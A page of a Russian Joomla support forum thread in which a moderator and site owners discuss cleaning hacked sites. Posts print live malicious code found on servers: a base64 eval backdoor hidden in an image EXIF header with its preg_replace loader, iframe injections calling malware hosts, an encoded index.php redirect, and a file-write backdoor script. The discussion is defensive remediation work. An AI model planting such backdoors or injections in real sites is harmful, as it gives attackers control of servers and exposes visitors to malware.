Форум русской поддержки Joomla!® CMS
03.12.2016, 15:35:34 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 25   Вниз
  Добавить закладку  |  Печать  
Автор

Вирус на сайте, редирект, что делать как лечить!

 (Прочитано 164103 раз)
0 Пользователей и 2 Гостей смотрят эту тему.
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« : 22.01.2013, 15:11:11 »

Просьба все коды вирусов вставлять картинками преобразовать код в картинку можно в любом сервисе вот один из них

Решил добавлять важное и свежее сверху топика

Добавлено 11-05-2014
*****************************************************************************************************
Как защитить сайт?
Задают один вопрос, как обезопасить версию 1.5.* разницы нету в версиях, вот рекомендации которые помогают защите сайта

- обновите сайт до 1.5.26
- обновите медиа менеджер последней заглушкой
- если сайт без регистрации поставьте права на закачку файлов администратору
- закройте папки htaccess на запрет выполнения скриптов
- закройте панель управления бейсик авторизацией

какие расширения стоят не могу угадать у каждого они разные, но их требуется просмотреть и если требуется обновить

этого должно хватить


Добавлено 08-06-2013
*****************************************************************************************************
Последнии чистки и обращения за помощью показывают, что начали делать все по другому, принцип старый метод тоже не новый  Grin
В файл *.php дописывается строка, но не с закодированным кодом как все привыкли, а с вложением кода из файла
Код:
@include_once('/home/.../language/posanted75.php');

как видим залитый файл с подом просто подгружен и при удалении файла сайт начинает частично или весь не работать, следует удалять все такие вставки из *.php файлов, это просто замена base64 на include_once
!Важно это только примеры и нет возможности описывать и расписывать все сигнатуры, да и файлы заливаются куда угодно и названия какие угодно могут быть

Далее, ну то что мне нравиться больше всего старо как не знаю что, но многие "помешавшись на за кодированности" вставок в файлах и криками "помогите что делать"  Smiley про это совсем забыли или даже не знают

Разбор полета
1 - в картинку в зоголовок вставляют backdoor выглядит примерно так
Код:
/.*/e eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
2 - в определенном файле вставляется код для подключения и прочтения заголовка из этой картинки
Код:
$exif = exif_read_data('/home/.../images/stories/***.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
3 - обратившись к файлу с таким кодом, который читает такой заголовок, у такой картинки, получают полный доступ к сайту через, этот мини shell

!Важно Все это прописывают до кода безопасности
Код:
define(  );
или в файлах где его нету

Тестирую нововведения  laugh все новое это не все хорошо забытое старое

Будьте при чистках внимательны.
*****************************************************************************************************


Решили создать отдельный топик прикрепить и вести все вопросы и ответы в нем.
Все вопросы связанные с лечением сайтов от вируса будут только в одной теме, просьба писать их здесь.
Прежде чем писать вопрос прочитать топик и раздел безопасности, на многие вопросы уже есть ответы.
Отныне все темы созданные про вирус, как лечить сайт и что делать будут удаляться.

Распишу основу, к примеру что происходит в основном в последнее время, как с этим и вообще бороться.

Все зависит от Ваших знаний и умений. Есть сканера для поиска shell, есть скрипты для поиска и перезаписи файлов на сервере, есть ssh и команды для работы на сервере. Начну писать самое простое это FTP и файлы, тут требуется меньше знаний, но больше времени.

Многие знают что:
-находят уязвимости
-загружают через них shell
-заражают файлы вписывая редирект

Поиск и удаление

Главное понимание того, что если сайт на хосте не один, то искать и чистить надо все, shell может быть на соседнем сайте и заражать не тот сайт, а только какой то определенный из соседних, и все думают, что зараза только на том что редиректит или ПС его блокирует
99% - Это Ваше первая ошибка и заблуждение



- смотрим дату измененных файлов
- смотрим логи сервера, смотрим обращение в это время к каким файла

важно! при работе надо закрывать доступ к сайту или делать все локально скачав файлы

- если не видим то, берем сканер поиска shell он покажет файлы которые надо просмотреть на наличие записанного shell-а, после того как нашли, так же потом смотрим логи по этому времени, для чего смотреть да для того чтоб увидеть через что попал shell и закрыть эту дверь (последние через что заливают это редактор JCE, менеджер расширений nonumber.nl, ну и старые не актуальные версии joomla)
- найдя и удалив shell переходим к удалению вредного кода, он может быть в файлах .htaccess, *.js, *.php
в .htaccess дописывается обычно "партянка" редиректов ее сразу видно
в *.js дописывается обычно в конец файла
Показать текстовый блок
в *.php дописывается обычно в начало или ко всем <?php
Показать текстовый блок
код могут дописать и в большинстве случаев, пишут за экран с большим отступом в право

это расписано простое направление в какую сторону двигаться, поймите все случаи разные и индивидуального характера, Ваш может быть другим, но смысл один

Как чистить файлы
- по найденному коду делать поиск найденного кода и его замену, любой программой если локально начиная от Notepad++ и теми программами которые могут вести поиск и замену в файлах, если на хостинге, то делать это скриптом поиска и замены
- возможно сделать это и по другому если вы полностью уверены что файлы сайта не изменялись то можно просто пере залить чистые файлы сверху зараженных от версии которая у вас

Как избежать
Про это пишут все и всегда и очень много
- делать постоянно бэкапы
- своевременное обновление как CMS так и всех расширений
- создавать пароли из букв (прописных и заглавных) и цифр, возможно использовать символы, чем длиннее тем лучше, это на случай брута админки
- взять за правило менять пароли, хоста, ftp, админки, и даже бд и это не параноя, а простое правило
- вести логи сервера с ротацией и чем больше срок их хранения тем лучше

те кто пишет что "мол у меня три года сайту и я не обновлялся" и "ни чего не было" им просто повезло, но в дальнейшем везти не будет с каждым днем просто находятся новые дыры и растут взломы, становится много сайтов и так же много тех кто ломает их
Чтобы избежать этого требуется следить за сайтами ежедневно работать, сайт это уже работа или хобби, на которые требуется тратить ежедневно время

Думаю если кто либо в топике распишет как он боролся именно у себя с проблемой заражения, то получиться более развернутое описание и описаны будут многие случаи более развернуто.

Вроде доступно написал без всяких терминов для тех кто ни понимает что такое shell (многие думают что вирус)

Цитировать
shell - утилита на подобии файлового менеджера, для удаленного подключение и удобной работы с файлами, это не вирус "черный вход", возможность пользования как из браузера так и с командной строки, ваши пароли если его залили не помеха(не требуется ему ftp и админка) это своего рода панель так которой вы пользуетесь на хостинге, там есть доступ как к файлам так и к БД, вы читаете про вирусный код и про код редиректов, shell ни какого отношения не имеет к ним, эту утилиту только могут закодировать в base64, но такое редко профи его кодируют по другому, shell также может находиться на другом сервере а у вас использоваться короткий код подключения к нему

Что требуется еще:

Права на папки и файлы ставим правильно

Как заливают shell:

Все просто нового ни чего не изобрели и не изобретут(хотя возможно но нет уверенности)
файл с shell заливается в основном в папки
Цитировать
images
images/stories
tmp

заливают либо сразу файл shell, либо "якобы картинку" файл с кодом и с расширением от изображения, который после загрузки либо остается таким же или ему меняют расширение, если он остается картинкой то тогда в этой директории появляется еще и файл .htaccesss для того чтоб этот файл работал


В конце того года появились новые вставки кода, для тех кто не знает опишу, в файлы движка либо просто в сторонние файлы (чаще всего) вставляется код

Показать текстовый блок

или

Показать текстовый блок

или еще множество вариантов исполнения, многие уже знают об этом кто то нет, файлов отношение которые не имеют к движку может быть сотни и названия у них разные у всех, так что могу только посочувствовать тем кто не понимает PHP и сам пытается что то найти и удалить месяцами.

Встречается случаи когда кеш системы не чистится, и после чистки файлов все равно нет результата
один из способов это почистить в БД таблицу #_session  не всегда помогает на 100%, видимо еще и кешируется у провайдера или на каких либо удаленных серверах
« Последнее редактирование: 28.09.2014, 00:08:02 от flyingspook » Записан
 
maxis
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 90


« Ответ #1 : 22.01.2013, 17:55:25 »

Вот этот гад размножается. Что он вообще делает? Где его удить? Сканом проверил, но всё чисто, а эта штука осталась.
Показать текстовый блок

Что он вообще делает?

+ предлагаю сделать мануал для чайников, меньше тема будет и информативнее.
« Последнее редактирование: 22.01.2013, 18:06:00 от maxis » Записан
makc9I
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 91


« Ответ #2 : 22.01.2013, 20:07:45 »

Показать текстовый блок

еще что-то вредное в скрипте имеется кроме?
Код:
;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://ljobopt.ddns.name/6a7f155e1b2a6f3c6bdeeeffd6cee592.2uihdSzvEzrUgFy?default" height="120" width="120"></iframe>');

Правильно ли я понял, что нужно удалить эту строку из всех зараженных файлов и прогнать антивирем снова, если найдет что-то еще, но меньше, выискивать еще строки и повторить процесс?
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #3 : 22.01.2013, 20:24:43 »

эта строка дописана у вас не в один файл(содержимое может меняться), она выводит вредоносное ПО с сайта донора

Цитировать
;document.write('<iframe***
смотрите в конце *.js файлов
Записан
makc9I
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 91


« Ответ #4 : 22.01.2013, 21:23:48 »

в Notepad++ заменил вредоносный код
Цитировать
document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://ljobopt.ddns.name/6a7f155e1b2a6f3c6bdeeeffd6cee592.2uihdSzvEzrUgFy?default" height="120" width="120"></iframe>');
на пробел
Стало чуть легче. Теперь 54 угрозы.
Аналагично вычленил еще один айфрейм, довел до 7 угроз. Допустим, доведу дело до конца. Как действовать в дальнейшем? Как обезопасить сайт от повторных угроз? Пароли на админке/хостинге сменил. Позже сменю пароль на бд
Записан
makc9I
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 91


« Ответ #5 : 22.01.2013, 22:10:34 »

Угроз не обнаружено, какие будут советы?
Записан
makc9I
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 91


« Ответ #6 : 22.01.2013, 22:49:05 »

вернул сайту работоспособность, но он все равно редиректит на какой-то левак при заходе с планшета на андройде. Удалил файл .htaccess с кучей строк со словами REDIRECT, и больше ни с чем. Не помогло
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #7 : 22.01.2013, 23:05:08 »

смотрите сторонний код в файлах *.php закодированный в base64
Записан
makc9I
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 91


« Ответ #8 : 22.01.2013, 23:11:42 »

каждый файлик смотреть руками без каких-либо методов автоматизации или существует некий алгоритм?
Записан
maxis
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 90


« Ответ #9 : 23.01.2013, 10:33:17 »

смотрите сторонний код в файлах *.php закодированный в base64

Уважаемый, напишите, пожалуйста, алгоримт действия shell. Вы ведь знаете о чём пишете. Все остальные как слепые котята ищут каждый на своём сайте и задают одни и те же вопросы. Или ссылку на описание в интернете, чтобы подготовить бойца. Тогда с этой информацией даже начинающим будет понятно, где искать и как правильно защищать сайты. А так же вопросы будут адекватные (подготовленные).

Лично я с помощью fls.php, только на третьей ветке форума случайно понял на что надо обращать внимание, а так нигде никаких комментариев - запускай и всё будет ок. Цель форума - собирать знание и давать его незнающим, а не реализовывать амбиции.

Заранее благодарю за понимание, прошу прощения за оффтоп.
После прочтения сжечь, не обижусь :-)
« Последнее редактирование: 23.01.2013, 10:41:42 от maxis » Записан
GWork
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 114


« Ответ #10 : 23.01.2013, 13:21:21 »

Уважаемые, вот нашел файлы в images и component/com_content с названиями - cart.skitch , .a7qsns.php, .mkbiyh.php
Скачать и посмотреть можно в архиве.

Надеюсь это он генерил вредокод в i'frame
_____________________________________
На данный момент вредоносного кода не замечано - ищете аналогичные файлы, сносите и делайте бэкап (т.к. некоторые файлы js испорчены или просто пустые), если не было изменений на сайтах. Я делаю бэкап за 16 число, вирус был замечен 19. Все гуд вроде.

[вложение удалено Администратором]
« Последнее редактирование: 23.01.2013, 15:52:56 от GWork » Записан
goral
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


« Ответ #11 : 23.01.2013, 20:18:11 »

Здравствуйте!
Вопрос по вирусу.
Сегодня обнаружил вирус на двух сайтах.
Точнее изменились файлы в главной директории, а именно - index.php, COPYRIGHT.php.
Также в главной директории появился файл - sejeal.jpg
Сайт на Joomla 1.5.25

Ситуации очень похожа на эту
http://forum.joomla.org/viewtopic.php?f=432&t=787405

Выкладываю содержание файла index.php (измененный вирусом)
<? eval(base64_decode('ZGVmaW5lKCAnX0pFWEVDJywgMSApOwoKZGVmaW5lKCdKUEFUSF9CQVNFJywgZGlybmFtZShfX0ZJTEVfXykgKTsKCmRlZmluZSggJ0RTJywgRElSRUNUT1JZX1NFUEFSQVRPUiApOwoKcmVxdWlyZV9vbmNlICggSlBBVEhfQkFTRSAuRFMuJ2luY2x1ZGVzJy5EUy4nZGVmaW5lcy5waHAnICk7CmV2YWwoYmFzZTY0X2RlY29kZSgnYUdWaFpHVnlLQ0pTWldaeVpYTm9PaUF5TlRzZ2RYSnNQVndpYUhSMGNEb3ZMM05vYjNCbWIzSjZZUzVwYm1adkwyNWxkRndpSWlrNycpKTsKcmVxdWlyZV9vbmNlICggSlBBVEhfQkFTRSAuRFMuJ2luY2x1ZGVzJy5EUy4nZnJhbWV3b3JrLnBocCcgKTsKCkpERUJVRyA/ICRfUFJPRklMRVItPm1hcmsoICdhZnRlckxvYWQnICkgOiBudWxsOwoKCiRtYWluZnJhbWUgPSYgSkZhY3Rvcnk6OmdldEFwcGxpY2F0aW9uKCdzaXRlJyk7CgoKJG1haW5mcmFtZS0+aW5pdGlhbGlzZSgpOwoKSlBsdWdpbkhlbHBlcjo6aW1wb3J0UGx1Z2luKCdzeXN0ZW0nKTsKCgpKREVCVUcgPyAkX1BST0ZJTEVSLT5tYXJrKCdhZnRlckluaXRpYWxpc2UnKSA6IG51bGw7CiRtYWluZnJhbWUtPnRyaWdnZXJFdmVudCgnb25BZnRlckluaXRpYWxpc2UnKTsKCgokbWFpbmZyYW1lLT5yb3V0ZSgpOwoKCiRJdGVtaWQgPSBKUmVxdWVzdDo6Z2V0SW50KCAnSXRlbWlkJyk7CiRtYWluZnJhbWUtPmF1dGhvcml6ZSgkSXRlbWlkKTsKCgpKREVCVUcgPyAkX1BST0ZJTEVSLT5tYXJrKCdhZnRlclJvdXRlJykgOiBudWxsOwokbWFpbmZyYW1lLT50cmlnZ2VyRXZlbnQoJ29uQWZ0ZXJSb3V0ZScpOwoKCiRvcHRpb24gPSBKUmVxdWVzdDo6Z2V0Q21kKCdvcHRpb24nKTsKJG1haW5mcmFtZS0+ZGlzcGF0Y2goJG9wdGlvbik7CgoKSkRFQlVHID8gJF9QUk9GSUxFUi0+bWFyaygnYWZ0ZXJEaXNwYXRjaCcpIDogbnVsbDsKJG1haW5mcmFtZS0+dHJpZ2dlckV2ZW50KCdvbkFmdGVyRGlzcGF0Y2gnKTsKCgokbWFpbmZyYW1lLT5yZW5kZXIoKTsKCgpKREVCVUcgPyAkX1BST0ZJTEVSLT5tYXJrKCdhZnRlclJlbmRlcicpIDogbnVsbDsKJG1haW5mcmFtZS0+dHJpZ2dlckV2ZW50KCdvbkFmdGVyUmVuZGVyJyk7CgoKZWNobyBKUmVzcG9uc2U6OnRvU3RyaW5nKCRtYWluZnJhbWUtPmdldENmZygnZ3ppcCcpKTs='));?>

После раскодировки выглядит следующим образом

define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
eval(base64_decode('aGVhZGVyKCJSZWZyZXNoOiAyNTsgdXJsPVwiaHR0cDovL3Nob3Bmb3J6YS5pbmZvL25ldFwiIik7'));
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;


$mainframe =& JFactory::getApplication('site');


$mainframe->initialise();

JPluginHelper::importPlugin('system');


JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');


$mainframe->route();


$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);


JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');


$option = JRequest::getCmd('option');
$mainframe->dispatch($option);


JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');


$mainframe->render();


JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');


echo JResponse::toString($mainframe->getCfg('gzip'));


После дальнейшей раскодировки

header("Refresh: 25; url=\"http://shopforza.info/net\"");

Далее выкладываю содержание файла COPYRIGHT.php

Restricted accoss
<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);

Далее описываю, как ведет себя сайт с этими кодами:
через несколько секунд перебрасывает на другой сайт.

Сейчас я удалил файл sejeal.jpg и перезаписал из архива
файлы index.php и COPYRIGHT.php

Понимаю, что это временная мера. Все может повториться.
Поэтому нужен совет, что делать дальше.

Выкладываю также содержание файла ошибок сервера.
Вот он

[Wed Jan 23 01:18:42 2013] [error] [client 77.91.203.82] client denied by server configuration: /home/virtwww/имя_на_сервере/http/susu.php
[Wed Jan 23 01:18:43 2013] [error] [client 77.91.203.82] client denied by server configuration: /home/virtwww/имя_на_сервере/http/susu.php
[Wed Jan 23 01:29:55 2013] [error] [client 77.91.203.82] client denied by server configuration: /home/virtwww/имя_на_сервере/http/susu.php
[Wed Jan 23 02:31:18 2013] [error] [client 80.74.139.3] client denied by server configuration: /home/virtwww/имя_на_сервере/http/COPYRIGHT.php
[Wed Jan 23 04:36:33 2013] [error] [client 46.119.35.188] File does not exist: /home/virtwww/имя_на_сервере/http/index.php\t20, referer: http://сайт/index.php%0920

Также выкладываю содержание файла .htaccess
(сейчас, когда пишу - смотрю, а этого файла инет,
хотя с утра был. Сейчас опять его записал на сайт)

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www.сайт\.com$ [NC]
RewriteRule ^(.*)$ http://сайт.com/$1 [R=301,L]
ErrorDocument 404 http://сайт.com/index.php?option=com_content&view=article&id=2813
ErrorDocument 500 http://сайт.com/error500.html
ErrorDocument 503 http://сайт.com/error503.html

# Включаем сжатие
<IfModule mod_deflate.c>
  <FilesMatch "\.(css|js|x?html?|php)$">
    SetOutputFilter DEFLATE
  </FilesMatch>
</IfModule>

##### Start ?tp=1 prevention######
RewriteCond %{QUERY_STRING} tp=(.*)
RewriteRule ^(.*)$ index.php [F,L]
##### End ?tp=1 prevention ######

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension XML files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension XML files
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode data within the URL
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule ^(.*)$ index.php [F,L]
ErrorDocument 403 http://сайт.com/
#
########## End - Rewrite rules to block out some common exploits

# Включаем кэширование
<IfModule mod_expires.c>
  ExpiresActive On
  ExpiresDefault "access plus 3600 seconds"
  ExpiresByType image/x-icon "access plus 3600 seconds"
  ExpiresByType image/jpeg "access plus 3600 seconds"
  ExpiresByType image/png "access plus 3600 seconds"
  ExpiresByType image/gif "access plus 3600 seconds"
  ExpiresByType application/x-shockwave-flash "access plus 3600 seconds"
  ExpiresByType text/css "access plus 3600 seconds"
  ExpiresByType text/javascript "access plus 3600 seconds"
  ExpiresByType application/x-javascript "access plus 3600 seconds"
  ExpiresByType text/html "access plus 3600 seconds"
  ExpiresByType application/xhtml+xml "access plus 3600 seconds"
</IfModule>

# Удаляем заголовок Last-Modified
<ifModule mod_headers.c>
  Header unset Last-Modified
</ifModule>

# Добавляем управляющие команды для кэширущих систем
<IfModule mod_headers.c>
  <FilesMatch "\.(ico|jpe?g|png|gif|swf)$">
    Header set Cache-Control "max-age=3600, public"
  </FilesMatch>
  <FilesMatch "\.(css)$">
    Header set Cache-Control "max-age=3600, public"
  </FilesMatch>
  <FilesMatch "\.(js)$">
    Header set Cache-Control "max-age=3600, private"
  </FilesMatch>
  <FilesMatch "\.(x?html?|php)$">
    Header set Cache-Control "max-age=3600, private, must-revalidate"
  </FilesMatch>
</IfModule>

# Выключаем проверку объектных тегов ETag
<ifModule mod_headers.c>
  <filesMatch "\.(ico|pdf|flv|jpg|jpeg|png|gif|js|css|swf)$">
    Header unset ETag
    FileETag None
 </filesMatch>


Надеюсь, кто-то сможет помочь.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3474


skype aqaus.com


« Ответ #12 : 23.01.2013, 20:30:54 »

JCE стоит?
Записан
goral
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


« Ответ #13 : 23.01.2013, 20:33:47 »

Хочу добавить.
На втором сайте, на котором такая же история,
тоже пропал файл .htaccess
Сейчас его восстановил.
О чем это может говорить? Как этот файл может пропадать?
Записан
goral
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


« Ответ #14 : 23.01.2013, 20:35:07 »

Под JCE подразумевается текстовый редактор? Да стоит
Записан
goral
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


« Ответ #15 : 23.01.2013, 20:40:31 »

Еще добавлю.
1. FTP уже почти год не пользуюсь. Тогда тоже сайт ломали.
Поэтому перешел на WinSCP
2. На обоих сайтах стоит защита на папку administrator
На одном сайте - через плагин с кодовым слом.
На другом сайте - через файл .htaccess
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3474


skype aqaus.com


« Ответ #16 : 23.01.2013, 20:58:29 »

JCE уязвим если не обновлен.
Записан
goral
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


« Ответ #17 : 23.01.2013, 21:03:34 »

Я просмотрел файлы этого компонента на сайте. Все даты старые.
Какие есть еще варианты или может подскажите где копать.
Версия JCE 1.5.7.4
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #18 : 23.01.2013, 21:58:34 »

Цитировать
Версия JCE 1.5.7.4
обновите до актуальной
и ищите залитый shell
плюс сам бдижок обновите до 1.5.26
Записан
goral
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


« Ответ #19 : 23.01.2013, 22:22:29 »

1. Подскажите как искать shell
2. Нашел в папке tmp файл php.class.php
Хотел скопировать его содержание,
но вставляется только это - яШяа
Остальное видно в Notepad+, но не копируется
Подскажите как прикрепить файл?


Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2649


step by step


« Ответ #20 : 23.01.2013, 23:47:56 »

Лично я с помощью fls.php, только на третьей ветке форума случайно понял на что надо обращать внимание, а так нигде никаких комментариев - запускай и всё будет ок.
Так может сначала узнать как устроена самая простая функция защиты в CMS Joomla , а потом искать бекдор с помощью сканера.
Вопрос-зачем в файлах .php Joomla проверяется определение константы ?
defined('_JEXEC')
Записан
goral
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 31


« Ответ #21 : 24.01.2013, 00:10:06 »

Joomla обновил до 1.5.26
JCE обновил до 2.3.1
Есть ли у кого замечания по файлу .htaccess ?
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #22 : 24.01.2013, 09:27:40 »

Цитировать
Так может сначала узнать как устроена самая простая функция защиты в CMS Joomla , а потом искать бекдор с помощью сканера.
Вопрос-зачем в файлах .php Joomla проверяется определение константы ?
defined('_JEXEC')

Последние взломы сейчас дописывают в системные файлы выше defined('_JEXEC') код(как сами понимаете код может быть любого содержания), просматривать требуется все файлы.
Записан
Polosat
Давно я тут
****

Репутация: +7/-0
Offline Offline

Пол: Мужской
Сообщений: 202


Мечты - это то, из чего сделано будущее


« Ответ #23 : 24.01.2013, 10:04:34 »

Уфф, до этого справлялся теперь что то никак

вычистил кучу заразы, обновил, поправил .htaccess, выполнил рекомендации с форума и один фиг через если открывать через поиск яндекса, происходит редирект, если открывать напрямую то все нормально

****

Код:
редирект идёт на http://ds-konzepte.info/libraries/pear/arch/pages/if.php

кто нибудь поборол аналогичную заразу?
« Последнее редактирование: 07.02.2013, 22:11:41 от Polosat » Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #24 : 24.01.2013, 10:57:12 »

файлы по новой не заражаются *.js  и *.php
Записан
Aleks45
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 36



« Ответ #25 : 24.01.2013, 11:12:12 »

Всем привет, помогите победить вирус, Google уже одел кандалы, в панели вебмастера пишет следующие ошибки:
media/system/js/mootools.js

(document.write('<iframe width="55" height="55" style="width:
100px;height:100px;position:absolute;left:-100px;top:0;" src
="http://bxprgiui.qhigh.com/geowgjwiehgwvbb.cfg?11"></iframe
>')Wink

http://schet-oplata.ru/component/comprofiler/registers.html проверки этой страницы сервер возвратил содержание, которое переадресовывает браузер на сайт, распространяющий вредоносное ПО и у этой странице точно такая же ситуация http://schet-oplata.ru/karta-sayta.html

Помогите разобраться, буду очень признателен
Записан
maxis
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 90


« Ответ #26 : 24.01.2013, 12:27:57 »

файлы по новой не заражаются *.js  и *.php

Т.е. если я где-то убрал лишний код, то он не вернётся? Кроме JCE дыры где-нибудь ещё есть (из основных)?

Глупый вопрос, а можно в первое сообщение добавить ссылку на актуальную версию и написать актуальную версию. Все сразу будут знать...
« Последнее редактирование: 24.01.2013, 12:34:55 от maxis » Записан
Polosat
Давно я тут
****

Репутация: +7/-0
Offline Offline

Пол: Мужской
Сообщений: 202


Мечты - это то, из чего сделано будущее


« Ответ #27 : 24.01.2013, 13:22:44 »

файлы по новой не заражаются *.js  и *.php

так в этом и вопрос, все вычистил, скачал сайт, перепроверил, вычистил по новой, а зараза все равно где то сидит.

Можно каким то образом посмотреть каким образом идёт редирект?
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #28 : 24.01.2013, 13:32:39 »

@Aleks45
у вас дописано в .js файлах в конце ;(document.write('<iframe и код
смотрите их

Цитировать
так в этом и вопрос, все вычистил, скачал сайт, перепроверил, вычистил по новой, а зараза все равно где то сидит.
а файлы то чистые или она по новой записывается, если по новой то надо искать shell, если файлы чистые то почистить кеш для начало и смотреть что могло остаться
« Последнее редактирование: 24.01.2013, 13:36:33 от flyingspook » Записан
Aleks45
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 36



« Ответ #29 : 24.01.2013, 15:33:12 »

@flyingspook
я удалял этот код несколько раз, он снова появляется в других js. файлах, как искать shell?? не разу этого не делал, может ты сможешь помочь найти эту гадину? я бы заплатил тебе, пиши в личку
Записан
Страниц: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 25   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet